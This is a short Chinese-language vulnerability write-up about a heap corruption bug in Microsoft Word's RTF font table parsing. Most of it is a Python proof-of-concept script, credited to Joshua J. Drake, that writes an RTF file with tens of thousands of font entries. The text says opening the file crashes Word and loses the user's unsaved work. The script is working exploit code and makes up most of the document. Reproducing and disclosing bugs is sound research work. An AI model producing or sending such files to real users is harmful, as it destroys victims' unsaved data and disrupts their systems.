漏洞效果
受害者打开python代码生成的RTF文件,RTF解析器解析恶意代码,触发堆溢出,Microsoft Word会闪退,用户其它Word中未保存的内容会丢失。
漏洞复现
PoC如下:
#!/usr/bin/python
#
# PoC for:
# Microsoft Word RTF Font Table Heap Corruption Vulnerability
#
# by Joshua J. Drake (@jduck)
#
import sys
# allow overriding the number of fonts
num = 32761
if len(sys.argv) > 1:
num = int(sys.argv[1])
f = open("tezt.rtf", "wb")
f.write(b"{\\rtf1{\n{\\fonttbl")
for i in range(num):
f.write(b"{\\f%dA;}\n" % i)
f.write(b"}\n")
f.write(b"{\\rtlch it didn't crash?? no calc?! BOO!!!}\n")
f.write(b"}}\n")
f.close()